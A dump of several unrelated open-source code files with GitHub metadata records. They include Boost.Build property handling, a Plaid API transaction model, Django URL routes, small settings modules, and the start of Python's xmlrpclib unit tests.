# import assert ;
#
#
# rule validate-property-sets ( property-sets * )
# {
# for local s in $(property-sets)
# {
# validate [ feature.split $(s) ] ;
# }
# }
#
def remove(attributes, properties):
"""Returns a property sets which include all the elements
in 'properties' that do not have attributes listed in 'attributes'."""
if isinstance(attributes, basestring):
attributes = [attributes]
assert is_iterable_typed(attributes, basestring)
assert is_iterable_typed(properties, basestring)
result = []
for e in properties:
attributes_new = feature.attributes(get_grist(e))
has_common_features = 0
for a in attributes_new:
if a in attributes:
has_common_features = 1
break
if not has_common_features:
result += e
return result
def take(attributes, properties):
"""Returns a property set which include all
properties in 'properties' that have any of 'attributes'."""
assert is_iterable_typed(attributes, basestring)
assert is_iterable_typed(properties, basestring)
result = []
for e in properties:
if b2.util.set.intersection(attributes, feature.attributes(get_grist(e))):
result.append(e)
return result
def translate_dependencies(properties, project_id, location):
assert is_iterable_typed(properties, Property)
assert isinstance(project_id, basestring)
assert isinstance(location, basestring)
result = []
for p in properties:
if not p.feature().dependency():
result.append(p)
else:
v = p.value()
m = re.match("(.*)//(.*)", v)
if m:
rooted = m.group(1)
if rooted[0] == '/':
# Either project id or absolute Linux path, do nothing.
pass
else:
rooted = os.path.join(os.getcwd(), location, rooted)
result.append(Property(p.feature(), rooted + "//" + m.group(2), p.condition()))
elif os.path.isabs(v):
result.append(p)
else:
result.append(Property(p.feature(), project_id + "//" + v, p.condition()))
return result
class PropertyMap:
""" Class which maintains a property set -> string mapping.
"""
def __init__ (self):
self.__properties = []
self.__values = []
def insert (self, properties, value):
""" Associate value with properties.
"""
assert is_iterable_typed(properties, basestring)
assert isinstance(value, basestring)
self.__properties.append(properties)
self.__values.append(value)
def find (self, properties):
""" Return the value associated with properties
or any subset of it. If more than one
subset has value assigned to it, return the
value for the longest subset, if it's unique.
"""
assert is_iterable_typed(properties, basestring)
return self.find_replace (properties)
def find_replace(self, properties, value=None):
assert is_iterable_typed(properties, basestring)
assert isinstance(value, (basestring, type(None)))
matches = []
match_ranks = []
for i in range(0, len(self.__properties)):
p = self.__properties[i]
if b2.util.set.contains (p, properties):
matches.append (i)
match_ranks.append(len(p))
best = sequence.select_highest_ranked (matches, match_ranks)
if not best:
return None
if len (best) > 1:
raise NoBestMatchingAlternative ()
best = best [0]
original = self.__values[best]
if value:
self.__values[best] = value
return original
# local rule __test__ ( )
# {
# import errors : try catch ;
# import feature ;
# import feature : feature subfeature compose ;
#
# # local rules must be explicitly re-imported
# import property : path-order ;
#
# feature.prepare-test property-test-temp ;
#
# feature toolset : gcc : implicit symmetric ;
# subfeature toolset gcc : version : 2.95.2 2.95.3 2.95.4
# 3.0 3.0.1 3.0.2 : optional ;
# feature define : : free ;
# feature runtime-link : dynamic static : symmetric link-incompatible ;
# feature optimization : on off ;
# feature variant : debug release : implicit composite symmetric ;
# feature rtti : on off : link-incompatible ;
#
# compose <variant>debug : <define>_DEBUG <optimization>off ;
# compose <variant>release : <define>NDEBUG <optimization>on ;
#
# import assert ;
# import "class" : new ;
#
# validate <toolset>gcc <toolset>gcc-3.0.1 : $(test-space) ;
#
# assert.result <toolset>gcc <rtti>off <define>FOO
# : refine <toolset>gcc <rtti>off
# : <define>FOO
# : $(test-space)
# ;
#
# assert.result <toolset>gcc <optimization>on
# : refine <toolset>gcc <optimization>off
# : <optimization>on
# : $(test-space)
# ;
#
# assert.result <toolset>gcc <rtti>off
# : refine <toolset>gcc : <rtti>off : $(test-space)
# ;
#
# assert.result <toolset>gcc <rtti>off <rtti>off:<define>FOO
# : refine <toolset>gcc : <rtti>off <rtti>off:<define>FOO
# : $(test-space)
# ;
#
# assert.result <toolset>gcc:<define>foo <toolset>gcc:<define>bar
# : refine <toolset>gcc:<define>foo : <toolset>gcc:<define>bar
# : $(test-space)
# ;
#
# assert.result <define>MY_RELEASE
# : evaluate-conditionals-in-context
# <variant>release,<rtti>off:<define>MY_RELEASE
# : <toolset>gcc <variant>release <rtti>off
#
# ;
#
# try ;
# validate <feature>value : $(test-space) ;
# catch "Invalid property '<feature>value': unknown feature 'feature'." ;
#
# try ;
# validate <rtti>default : $(test-space) ;
# catch \"default\" is not a known value of feature <rtti> ;
#
# validate <define>WHATEVER : $(test-space) ;
#
# try ;
# validate <rtti> : $(test-space) ;
# catch "Invalid property '<rtti>': No value specified for feature 'rtti'." ;
#
# try ;
# validate value : $(test-space) ;
# catch "value" is not a value of an implicit feature ;
#
#
# assert.result <rtti>on
# : remove free implicit : <toolset>gcc <define>foo <rtti>on : $(test-space) ;
#
# assert.result <include>a
# : select include : <include>a <toolset>gcc ;
#
# assert.result <include>a
# : select include bar : <include>a <toolset>gcc ;
#
# assert.result <include>a <toolset>gcc
# : select include <bar> <toolset> : <include>a <toolset>gcc ;
#
# assert.result <toolset>kylix <include>a
# : change <toolset>gcc <include>a : <toolset> kylix ;
#
# # Test ordinary properties
# assert.result
# : split-conditional <toolset>gcc
# ;
#
# # Test properties with ":"
# assert.result
# : split-conditional <define>FOO=A::B
# ;
#
# # Test conditional feature
# assert.result <toolset>gcc,<toolset-gcc:version>3.0 <define>FOO
# : split-conditional <toolset>gcc,<toolset-gcc:version>3.0:<define>FOO
# ;
#
# feature.finish-test property-test-temp ;
# }
#
|
{
"content_hash": "0becdb2355a5460332c518187bbd45e1",
"timestamp": "",
"source": "github",
"line_count": 645,
"max_line_length": 95,
"avg_line_length": 31.804651162790698,
"alnum_prop": 0.570927171687628,
"repo_name": "zjutjsj1004/third",
"id": "e49ff9c5fa94b2edc53a1922614619969e4f8ca4",
"size": "20853",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "boost/tools/build/src/build/property.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Assembly",
"bytes": "224158"
},
{
"name": "Batchfile",
"bytes": "33175"
},
{
"name": "C",
"bytes": "5576593"
},
{
"name": "C#",
"bytes": "41850"
},
{
"name": "C++",
"bytes": "179595990"
},
{
"name": "CMake",
"bytes": "28348"
},
{
"name": "CSS",
"bytes": "331303"
},
{
"name": "Cuda",
"bytes": "26521"
},
{
"name": "FORTRAN",
"bytes": "1856"
},
{
"name": "Groff",
"bytes": "1305458"
},
{
"name": "HTML",
"bytes": "159660377"
},
{
"name": "IDL",
"bytes": "15"
},
{
"name": "JavaScript",
"bytes": "285786"
},
{
"name": "Lex",
"bytes": "1290"
},
{
"name": "Makefile",
"bytes": "1202020"
},
{
"name": "Max",
"bytes": "37424"
},
{
"name": "Objective-C",
"bytes": "3674"
},
{
"name": "Objective-C++",
"bytes": "651"
},
{
"name": "PHP",
"bytes": "60249"
},
{
"name": "Perl",
"bytes": "37297"
},
{
"name": "Perl6",
"bytes": "2130"
},
{
"name": "Python",
"bytes": "1833677"
},
{
"name": "QML",
"bytes": "613"
},
{
"name": "QMake",
"bytes": "17385"
},
{
"name": "Rebol",
"bytes": "372"
},
{
"name": "Shell",
"bytes": "1144162"
},
{
"name": "Tcl",
"bytes": "1205"
},
{
"name": "TeX",
"bytes": "38313"
},
{
"name": "XSLT",
"bytes": "564356"
},
{
"name": "Yacc",
"bytes": "20341"
}
],
"symlink_target": ""
}
|
"""
The Plaid API
The Plaid REST API. Please see https://plaid.com/docs/api for more details. # noqa: E501
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from plaid.model_utils import ( # noqa: F401
ApiTypeError,
ModelComposed,
ModelNormal,
ModelSimple,
cached_property,
change_keys_js_to_python,
convert_js_args_to_python_args,
date,
datetime,
file_type,
none_type,
validate_get_composed_info,
)
def lazy_import():
from plaid.model.enrich_transaction_direction import EnrichTransactionDirection
globals()['EnrichTransactionDirection'] = EnrichTransactionDirection
class ClientProvidedTransaction(ModelNormal):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
discriminator_value_class_map (dict): A dict to go from the discriminator
variable value to the discriminator class name.
validations (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {
}
validations = {
}
@cached_property
def additional_properties_type():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
"""
lazy_import()
return (bool, date, datetime, dict, float, int, list, str, none_type,) # noqa: E501
_nullable = False
@cached_property
def openapi_types():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
Returns
openapi_types (dict): The key is attribute name
and the value is attribute type.
"""
lazy_import()
return {
'id': (str,), # noqa: E501
'description': (str,), # noqa: E501
'amount': (float,), # noqa: E501
'iso_currency_code': (str,), # noqa: E501
'direction': (EnrichTransactionDirection,), # noqa: E501
}
@cached_property
def discriminator():
return None
attribute_map = {
'id': 'id', # noqa: E501
'description': 'description', # noqa: E501
'amount': 'amount', # noqa: E501
'iso_currency_code': 'iso_currency_code', # noqa: E501
'direction': 'direction', # noqa: E501
}
_composed_schemas = {}
required_properties = set([
'_data_store',
'_check_type',
'_spec_property_naming',
'_path_to_item',
'_configuration',
'_visited_composed_classes',
])
@convert_js_args_to_python_args
def __init__(self, id, description, amount, iso_currency_code, *args, **kwargs): # noqa: E501
"""ClientProvidedTransaction - a model defined in OpenAPI
Args:
id (str): A unique ID for the transaction used to help you tie data back to your systems.
description (str): The raw description of the transaction.
amount (float): The absolute value of the transaction (>= 0)
iso_currency_code (str): The ISO-4217 currency code of the transaction, e.g., USD.
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
direction (EnrichTransactionDirection): [optional] # noqa: E501
"""
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
self.id = id
self.description = description
self.amount = amount
self.iso_currency_code = iso_currency_code
for var_name, var_value in kwargs.items():
if var_name not in self.attribute_map and \
self._configuration is not None and \
self._configuration.discard_unknown_keys and \
self.additional_properties_type is None:
# discard variable.
continue
setattr(self, var_name, var_value)
|
{
"content_hash": "666c29437d0b5094b1dcc364d9cf5899",
"timestamp": "",
"source": "github",
"line_count": 194,
"max_line_length": 110,
"avg_line_length": 40.78350515463917,
"alnum_prop": 0.5664812942366027,
"repo_name": "plaid/plaid-python",
"id": "eb34c6a5650f9f9c26d920aa07ef3d85f8bfb2a8",
"size": "7912",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "plaid/model/client_provided_transaction.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Dockerfile",
"bytes": "323"
},
{
"name": "Makefile",
"bytes": "622"
},
{
"name": "Mustache",
"bytes": "125163"
},
{
"name": "Python",
"bytes": "9342874"
}
],
"symlink_target": ""
}
|
from django.conf.urls import patterns, url
from storybase_taxonomy.views import CategoryExplorerRedirectView, TagStoryListView
urlpatterns = patterns('',
url(r'topics/(?P<slug>[0-9a-z-]+)/$',
CategoryExplorerRedirectView.as_view(),
name='topic_stories'),
url(r'tags/(?P<slug>[0-9a-z-]+)/$',
TagStoryListView.as_view(),
name='tag_stories'),
)
|
{
"content_hash": "d1d366c6146ece6c224a6af9bdc9d9d5",
"timestamp": "",
"source": "github",
"line_count": 12,
"max_line_length": 83,
"avg_line_length": 32.083333333333336,
"alnum_prop": 0.6545454545454545,
"repo_name": "denverfoundation/storybase",
"id": "078317e70972b11746d9b1b8719b1c8f20ce5549",
"size": "385",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "apps/storybase_taxonomy/urls.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "285649"
},
{
"name": "Cucumber",
"bytes": "176820"
},
{
"name": "HTML",
"bytes": "286197"
},
{
"name": "JavaScript",
"bytes": "1623541"
},
{
"name": "Makefile",
"bytes": "1006"
},
{
"name": "Python",
"bytes": "3020016"
},
{
"name": "Shell",
"bytes": "23932"
}
],
"symlink_target": ""
}
|
"""
This module defines available model types.
"""
from __future__ import print_function
from muddery.worlddata.data_sets import DataSets as BaseDataSets
from muddery.worlddata.data_handler import DataHandler, SystemDataHandler, LocalizedStringsHandler
class DataSets(BaseDataSets):
def at_creation(self):
"""
You can add custom data handlers in this method.
Returns:
None
"""
super(DataSets, self).at_creation()
# self.add_data_handler(self.object_additional_data, DataHandler("custom_model"))
|
{
"content_hash": "9858bad7ad22b2668461d63b96f68691",
"timestamp": "",
"source": "github",
"line_count": 21,
"max_line_length": 98,
"avg_line_length": 26.904761904761905,
"alnum_prop": 0.6938053097345133,
"repo_name": "MarsZone/DreamLand",
"id": "ba803685e9e20fb3f7ed6259dbbe34931af6af95",
"size": "565",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "demo/worlddata/data_sets.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "106"
},
{
"name": "CSS",
"bytes": "90990"
},
{
"name": "Emacs Lisp",
"bytes": "2734"
},
{
"name": "HTML",
"bytes": "204486"
},
{
"name": "JavaScript",
"bytes": "157093"
},
{
"name": "Python",
"bytes": "3191395"
},
{
"name": "Shell",
"bytes": "4237"
}
],
"symlink_target": ""
}
|
"""
jobber.conf
~~~~~~~~~~~
Exposes a `_Settings_` instance with applied overrides from local.py.
"""
from jobber.conf import default as default_settings
try:
from jobber.conf import local as local_settings
except ImportError:
local_settings = None
def _make_dict(module):
"""Transforms a module into a `dict` containing all the names that the
module defines.
"""
if not module:
return {}
return {name: getattr(module, name) for name in dir(module)}
_default = _make_dict(default_settings)
_local = _make_dict(local_settings)
class _Settings(object):
"""Placeholder class for settings."""
def __init__(self, *args):
for setting in args:
if setting: self.apply(setting)
def apply(self, settings):
for key, value in settings.iteritems():
if key == key.upper():
setattr(self, key, value)
# Expose a global `settings` property.
settings = _Settings(_default, _local)
|
{
"content_hash": "c33e8efc2837e03c9ea99b180ac3bed5",
"timestamp": "",
"source": "github",
"line_count": 43,
"max_line_length": 74,
"avg_line_length": 22.790697674418606,
"alnum_prop": 0.6418367346938776,
"repo_name": "hackcyprus/jobber",
"id": "1ce5979967385308d94443d1932ceddd07a79642",
"size": "980",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "jobber/conf/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "41661"
},
{
"name": "JavaScript",
"bytes": "6949"
},
{
"name": "Python",
"bytes": "117838"
},
{
"name": "Ruby",
"bytes": "748"
},
{
"name": "Shell",
"bytes": "269"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
from netmiko.brocade.brocade_nos_ssh import BrocadeNosSSH
from netmiko.brocade.brocade_fastiron import BrocadeFastironSSH
from netmiko.brocade.brocade_fastiron import BrocadeFastironTelnet
from netmiko.brocade.brocade_netiron import BrocadeNetironSSH
from netmiko.brocade.brocade_netiron import BrocadeNetironTelnet
__all__ = ['BrocadeNosSSH', 'BrocadeFastironSSH', 'BrocadeFastironTelnet',
'BrocadeNetironSSH', 'BrocadeNetironTelnet']
|
{
"content_hash": "170a24f74bd3873b7776416fb1a3574a",
"timestamp": "",
"source": "github",
"line_count": 9,
"max_line_length": 74,
"avg_line_length": 54.22222222222222,
"alnum_prop": 0.8258196721311475,
"repo_name": "isidroamv/netmiko",
"id": "c841d136c88de259854bd8f933864f25a2ca3f46",
"size": "488",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "netmiko/brocade/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "244012"
},
{
"name": "Shell",
"bytes": "10760"
}
],
"symlink_target": ""
}
|
#!/usr/bin/env python
#
# Copyright (c) 2014, 2016 Apple Inc. All rights reserved.
# Copyright (c) 2014 University of Washington. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY APPLE INC. AND ITS CONTRIBUTORS ``AS IS''
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL APPLE INC. OR ITS CONTRIBUTORS
# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
# THE POSSIBILITY OF SUCH DAMAGE.
# Generator templates, which can be filled with string.Template.
# Following are classes that fill the templates from the typechecked model.
class GeneratorTemplates:
CopyrightBlock = (
"""
// DO NOT EDIT THIS FILE. It is automatically generated from ${inputFilename}
// by the script: Source/JavaScriptCore/inspector/scripts/generate-inspector-protocol-bindings.py""")
|
{
"content_hash": "c2eed45a02467e96007bcb4a29ca9291",
"timestamp": "",
"source": "github",
"line_count": 36,
"max_line_length": 101,
"avg_line_length": 50.166666666666664,
"alnum_prop": 0.7757475083056479,
"repo_name": "hxxft/lynx-native",
"id": "891681ffd71f549576cff1aa50202e129b92ee88",
"size": "3289",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "Core/third_party/JavaScriptCore/inspector/scripts/codegen/generator_templates.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "8846"
},
{
"name": "C++",
"bytes": "1644015"
},
{
"name": "CMake",
"bytes": "16371"
},
{
"name": "HTML",
"bytes": "132541"
},
{
"name": "Java",
"bytes": "545560"
},
{
"name": "JavaScript",
"bytes": "6469482"
},
{
"name": "Objective-C",
"bytes": "58832"
},
{
"name": "Objective-C++",
"bytes": "174916"
},
{
"name": "Python",
"bytes": "55792"
},
{
"name": "Ruby",
"bytes": "1520"
},
{
"name": "Shell",
"bytes": "515"
},
{
"name": "TypeScript",
"bytes": "1851"
},
{
"name": "Vue",
"bytes": "37901"
}
],
"symlink_target": ""
}
|
import base64
import datetime
import sys
import time
import unittest
import xmlrpclib
import SimpleXMLRPCServer
import mimetools
import httplib
import socket
import StringIO
import os
import re
from test import test_support
try:
import threading
except ImportError:
threading = None
try:
unicode
except NameError:
have_unicode = False
else:
have_unicode = True
alist = [{'astring': 'foo@bar.baz.spam',
'afloat': 7283.43,
'anint': 2**20,
'ashortlong': 2L,
'anotherlist': ['.zyx.41'],
'abase64': xmlrpclib.Binary("my dog has fleas"),
'boolean': xmlrpclib.False,
'unicode': u'\u4000\u6000\u8000',
u'ukey\u4000': 'regular value',
'datetime1': xmlrpclib.DateTime('20050210T11:41:23'),
'datetime2': xmlrpclib.DateTime(
(2005, 02, 10, 11, 41, 23, 0, 1, -1)),
'datetime3': xmlrpclib.DateTime(
datetime.datetime(2005, 02, 10, 11, 41, 23)),
}]
class XMLRPCTestCase(unittest.TestCase):
def test_dump_load(self):
self.assertEquals(alist,
xmlrpclib.loads(xmlrpclib.dumps((alist,)))[0][0])
def test_dump_bare_datetime(self):
# This checks that an unwrapped datetime.date object can be handled
# by the marshalling code. This can't be done via test_dump_load()
# since with use_datetime set to 1 the unmarshaller would create
# datetime objects for the 'datetime[123]' keys as well
dt = datetime.datetime(2005, 02, 10, 11, 41, 23)
s = xmlrpclib.dumps((dt,))
(newdt,), m = xmlrpclib.loads(s, use_datetime=1)
self.assertEquals(newdt, dt)
self.assertEquals(m, None)
(newdt,), m = xmlrpclib.loads(s, use_datetime=0)
self.assertEquals(newdt, xmlrpclib.DateTime('20050210T11:41:23'))
def test_datetime_before_1900(self):
# same as before but with a date before 1900
dt = datetime.datetime(1, 02, 10, 11, 41, 23)
s = xmlrpclib.dumps((dt,))
(newdt,), m = xmlrpclib.loads(s, use_datetime=1)
self.assertEquals(newdt, dt)
self.assertEquals(m, None)
(newdt,), m = xmlrpclib.loads(s, use_datetime=0)
self.assertEquals(newdt, xmlrpclib.DateTime('00010210T11:41:23'))
def test_cmp_datetime_DateTime(self):
now = datetime.datetime.now()
dt = xmlrpclib.DateTime(now.timetuple())
self.assertTrue(dt == now)
self.assertTrue(now == dt)
then = now + datetime.timedelta(seconds=4)
self.assertTrue(then >= dt)
self.assertTrue(dt < then)
def test_bug_1164912 (self):
d = xmlrpclib.DateTime()
((new_d,), dummy) = xmlrpclib.loads(xmlrpclib.dumps((d,),
methodresponse=True))
self.assertIsInstance(new_d.value, str)
# Check that the output of dumps() is still an 8-bit string
s = xmlrpclib.dumps((new_d,), methodresponse=True)
self.assertIsInstance(s, str)
def test_newstyle_class(self):
class T(object):
pass
t = T()
t.x = 100
t.y = "Hello"
((t2,), dummy) = xmlrpclib.loads(xmlrpclib.dumps((t,)))
self.assertEquals(t2, t.__dict__)
def test_dump_big_long(self):
self.assertRaises(OverflowError, xmlrpclib.dumps, (2L**99,))
def test_dump_bad_dict(self):
self.assertRaises(TypeError, xmlrpclib.dumps, ({(1,2,3): 1},))
def test_dump_recursive_seq(self):
l = [1,2,3]
t = [3,4,5,l]
l.append(t)
self.assertRaises(TypeError, xmlrpclib.dumps, (l,))
def test_dump_recursive_dict(self):
d = {'1':1, '2':1}
t = {'3':3, 'd':d}
d['t'] = t
self.assertRaises(TypeError, xmlrpclib.dumps, (d,))
def test_dump_big_int(self):
if sys.maxint > 2L**31-1:
self.assertRaises(OverflowError, xmlrpclib.dumps,
(int(2L**34),))
xmlrpclib.dumps((xmlrpclib.MAXINT, xmlrpclib.MININT))
self.assertRaises(OverflowError, xmlrpclib.dumps, (xmlrpclib.MAXINT+1,))
self.assertRaises(OverflowError, xmlrpclib.dumps, (xmlrpclib.MININT-1,))
def dummy_write(s):
pass
m = xmlrpclib.Marshaller()
m.dump_int(xmlrpclib.MAXINT, dummy_write)
m.dump_int(xmlrpclib.MININT, dummy_write)
self.assertRaises(OverflowError, m.dump_int, xmlrpclib.MAXINT+1, dummy_write)
self.assertRaises(OverflowError, m.dump_int, xmlrpclib.MININT-1, dummy_write)
def test_dump_none(self):
value = alist + [None]
arg1 = (alist + [None],)
strg = xmlrpclib.dumps(arg1, allow_none=True)
self.assertEquals(value,
xmlrpclib.loads(strg)[0][0])
self.assertRaises(TypeError, xmlrpclib.dumps, (arg1,))
def test_default_encoding_issues(self):
# SF bug #1115989: wrong decoding in '_stringify'
utf8 = """<?xml version='1.0' encoding='iso-8859-1'?>
<params>
<param><value>
<string>abc \x95</string>
</value></param>
<param><value>
<struct>
<member>
<name>def \x96</name>
<value><string>ghi \x97</string></value>
</member>
</struct>
</value></param>
</params>
"""
# sys.setdefaultencoding() normally doesn't exist after site.py is
# loaded. Import a temporary fresh copy to get access to it
# but then restore the original copy to avoid messing with
# other potentially modified sys module attributes
old_encoding = sys.getdefaultencoding()
with test_support.CleanImport('sys'):
import sys as temp_sys
temp_sys.setdefaultencoding("iso-8859-1")
try:
(s, d), m = xmlrpclib.loads(utf8)
finally:
temp_sys.setdefaultencoding(old_encoding)
items = d.items()
if have_unicode:
self.assertEquals(s, u"abc \x95")
self.assertIsInstance(s, unicode)
self.assertEquals(items, [(u"def \x96", u"ghi \x97")])
self.assertIsInstance(items[0][0], unicode)
self.assertIsInstance(items[0][1], unicode)
else:
self.assertEquals(s, "abc \xc2\x95")
self.assertEquals(items, [("def \xc2\x96", "ghi \xc2\x97")])
class HelperTestCase(unittest.TestCase):
def test_escape(self):
self.assertEqual(xmlrpclib.escape("a&b"), "a&b")
self.assertEqual(xmlrpclib.escape("a<b"), "a<b")
self.assertEqual(xmlrpclib.escape("a>b"), "a>b")
class FaultTestCase(unittest.TestCase):
def test_repr(self):
f = xmlrpclib.Fault(42, 'Test Fault')
self.assertEqual(repr(f), "<Fault 42: 'Test Fault'>")
self.assertEqual(repr(f), str(f))
def test_dump_fault(self):
f = xmlrpclib.Fault(42, 'Test Fault')
s = xmlrpclib.dumps((f,))
(newf,), m = xmlrpclib.loads(s)
self.assertEquals(newf, {'faultCode': 42, 'faultString': 'Test Fault'})
self.assertEquals(m, None)
s = xmlrpclib.Marshaller().dumps(f)
self.assertRaises(xmlrpclib.Fault, xmlrpclib.loads, s)
class DateTimeTestCase(unittest.TestCase):
def test_default(self):
t = xmlrpclib.DateTime()
def test_time(self):
d = 1181399930.036952
t = xmlrpclib.DateTime(d)
self.assertEqual(str(t), time.strftime("%Y%m%dT%H:%M:%S", time.localtime(d)))
def test_time_tuple(self):
d = (2007,6,9,10,38,50,5,160,0)
t = xmlrpclib.DateTime(d)
self.assertEqual(str(t), '20070609T10:38:50')
def test_time_struct(self):
d = time.localtime(1181399930.036952)
t = xmlrpclib.DateTime(d)
self.assertEqual(str(t), time.strftime("%Y%m%dT%H:%M:%S", d))
def test_datetime_datetime(self):
d = datetime.datetime(2007,1,2,3,4,5)
t = xmlrpclib.DateTime(d)
self.assertEqual(str(t), '20070102T03:04:05')
def test_repr(self):
d = datetime.datetime(2007,1,2,3,4,5)
t = xmlrpclib.DateTime(d)
val ="<DateTime '20070102T03:04:05' at %x>" % id(t)
self.assertEqual(repr(t), val)
def test_decode(self):
d = ' 20070908T07:11:13 '
t1 = xmlrpclib.DateTime()
t1.decode(d)
tref = xmlrpclib.DateTime(datetime.datetime(2007,9,8,7,11,13))
self.assertEqual(t1, tref)
t2 = xmlrpclib._datetime(d)
self.assertEqual(t1, tref)
class BinaryTestCase(unittest.TestCase):
def test_default(self):
t = xmlrpclib.Binary()
self.assertEqual(str(t), '')
def test_string(self):
d = '\x01\x02\x03abc123\xff\xfe'
t = xmlrpclib.Binary(d)
self.assertEqual(str(t), d)
def test_decode(self):
d = '\x01\x02\x03abc123\xff\xfe'
de = base64.encodestring(d)
t1 = xmlrpclib.Binary()
t1.decode(de)
self.assertEqual(str(t1), d)
t2 = xmlrpclib._binary(de)
self.assertEqual(str(t2), d)
ADDR = PORT = URL = None
# The evt is set twice. First when the server is ready to serve.
# Second when the server has been shutdown. The user must clear
# the event after it has been set the first time to catch the second set.
def http_server(evt, numrequests, requestHandler=None):
class TestInstanceClass:
def div(self, x, y):
return x // y
def _methodHelp(self, name):
if name == 'div':
return 'This is the div function'
def my_function():
'''This is my function'''
return True
class MyXMLRPCServer(SimpleXMLRPCServer.SimpleXMLRPCServer):
def get_request(self):
# Ensure the socket is always non-blocking. On Linux, socket
# attributes are not inherited like they are on *BSD and Windows.
s, port = self.socket.accept()
s.setblocking(True)
return s, port
if not requestHandler:
requestHandler = SimpleXMLRPCServer.SimpleXMLRPCRequestHandler
serv = MyXMLRPCServer(("localhost", 0), requestHandler,
logRequests=False, bind_and_activate=False)
try:
serv.socket.settimeout(3)
serv.server_bind()
global ADDR, PORT, URL
ADDR, PORT = serv.socket.getsockname()
#connect to IP address directly. This avoids socket.create_connection()
#trying to connect to to "localhost" using all address families, which
#causes slowdown e.g. on vista which supports AF_INET6. The server listens
#on AF_INET only.
URL = "http://%s:%d"%(ADDR, PORT)
serv.server_activate()
serv.register_introspection_functions()
serv.register_multicall_functions()
serv.register_function(pow)
serv.register_function(lambda x,y: x+y, 'add')
serv.register_function(my_function)
serv.register_instance(TestInstanceClass())
evt.set()
# handle up to 'numrequests' requests
while numrequests > 0:
serv.handle_request()
numrequests -= 1
except socket.timeout:
pass
finally:
serv.socket.close()
PORT = None
evt.set()
def http_multi_server(evt, numrequests, requestHandler=None):
class TestInstanceClass:
def div(self, x, y):
return x // y
def _methodHelp(self, name):
if name == 'div':
return 'This is the div function'
def my_function():
'''This is my function'''
return True
class MyXMLRPCServer(SimpleXMLRPCServer.MultiPathXMLRPCServer):
def get_request(self):
# Ensure the socket is always non-blocking. On Linux, socket
# attributes are not inherited like they are on *BSD and Windows.
s, port = self.socket.accept()
s.setblocking(True)
return s, port
if not requestHandler:
